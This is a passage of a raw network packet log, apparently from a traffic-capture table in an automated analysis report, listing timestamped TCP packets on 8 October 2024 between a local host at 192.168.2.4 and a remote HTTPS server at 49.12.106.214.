                                                                                                                Oct 8, 2024 04:59:46.440187931 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.440227985 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.440275908 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.440280914 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.440331936 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.449089050 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.449130058 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.449167013 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.449172974 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.449224949 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.458193064 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.458231926 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.458276987 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.458292007 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.458326101 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.458349943 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.465116978 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.465158939 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.465192080 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.465198994 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.465223074 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.465241909 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.474416018 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.474456072 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.474487066 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.474493027 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.474525928 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.474546909 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.494967937 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.495029926 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.495069981 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.495075941 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.495119095 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.506215096 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.506259918 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.506310940 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.506316900 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.506350040 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.506387949 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.517653942 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.517699003 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.517751932 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.517760992 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.517802000 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.527196884 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.527240992 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.527293921 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.527307987 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.527329922 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.527354002 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.535861969 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.535908937 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.536079884 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.536087990 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.536139965 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.544769049 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.544809103 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.544863939 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.544871092 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.544917107 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.552088022 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.552129030 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.552181005 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.552194118 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.552217007 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.552239895 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.561449051 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.561505079 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.561549902 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.561561108 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.561585903 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.561615944 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.581617117 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.581660032 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.581710100 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.581726074 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.581760883 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.581785917 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.592816114 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.592858076 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.592886925 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.592891932 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.592945099 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.604506016 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.604537010 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.604655981 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.604681015 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.604728937 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.613790035 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.613837957 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.613913059 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.613919020 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.613965988 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.622747898 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.622773886 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.622853041 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.622858047 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.622905016 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.631520987 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.631546021 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.631613016 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.631618023 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.631659031 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.639076948 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.639100075 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.639177084 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.639180899 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.639228106 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.647993088 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.648051023 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.648155928 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.648160934 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.648277998 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.671848059 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.671871901 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.671956062 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.671961069 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.672010899 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.685354948 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.685380936 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.685477972 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.685508013 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.685556889 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.696094990 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.696109056 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.696176052 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.696206093 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.696254969 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.704418898 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.704436064 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.704513073 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.704519987 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.704581022 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.716548920 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.716562986 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.716646910 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.716659069 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.716697931 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.720980883 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.721038103 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.721163988 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.721170902 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.721271992 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.729180098 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.729201078 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.729259014 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.729269028 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.729315042 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.740027905 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.740046978 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.740099907 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.740106106 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.740123987 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.740145922 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.758419037 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.758435011 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.758498907 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.758505106 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.758547068 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.772213936 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.772238016 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.772341013 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.772351027 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.772396088 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.782891989 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.782915115 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.782980919 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.782985926 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.783027887 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.791362047 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.791380882 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.791474104 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.791482925 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.791492939 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.791524887 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.803430080 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.803452015 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.803512096 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.803518057 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.803564072 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.803590059 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.807722092 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.807742119 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.807801008 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.807810068 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.807842970 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.807862997 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.816023111 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.816042900 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.816106081 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.816112995 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.816138983 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.816157103 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.826651096 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.826669931 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.826726913 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.826731920 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.826771975 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.826802015 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.845151901 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.845170021 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.845258951 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.845273018 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.845310926 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.858952045 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.858972073 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.859021902 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.859030962 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.859060049 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.859076023 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.869654894 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.869683981 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.869806051 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.869817972 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.869858980 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.878185034 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.878205061 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.878285885 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.878294945 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.878333092 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.890258074 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.890279055 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.890341043 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.890358925 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.890377045 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.890402079 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.895483017 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.895507097 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.895591974 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.895601034 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.895646095 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.902899981 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.902918100 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.902985096 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.902991056 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.903028011 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.913539886 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.913570881 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.913625956 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.913631916 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.913674116 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.932473898 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.932488918 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.932562113 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.932574987 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.932614088 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.945652008 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.945669889 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.945759058 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.945766926 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.945807934 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.956471920 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.956526995 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.956624031 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.956633091 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.956748009 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.965262890 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.965315104 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.965396881 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.965410948 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.965495110 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.977348089 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.977415085 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.977643013 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.977672100 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.977766037 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.981688023 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.981741905 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.981873035 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.981889009 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.981935024 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.989867926 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.989881039 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.989940882 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.989948988 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.989986897 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.000448942 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.000469923 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.000539064 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.000545979 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.000582933 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.019475937 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.019496918 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.019543886 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.019550085 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.019583941 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.019602060 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.032622099 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.032644033 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.032705069 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.032711029 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.032733917 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.032753944 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.043555021 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.043572903 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.043617964 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.043626070 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.043652058 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.043665886 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.051989079 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.052007914 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.052115917 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.052129984 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.052172899 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.270277023 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.270337105 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.270369053 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.270384073 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.270436049 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.270519972 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.270562887 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.270591021 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.270596981 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.270626068 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.270648003 CEST49748443192.168.2.449.12.106.214
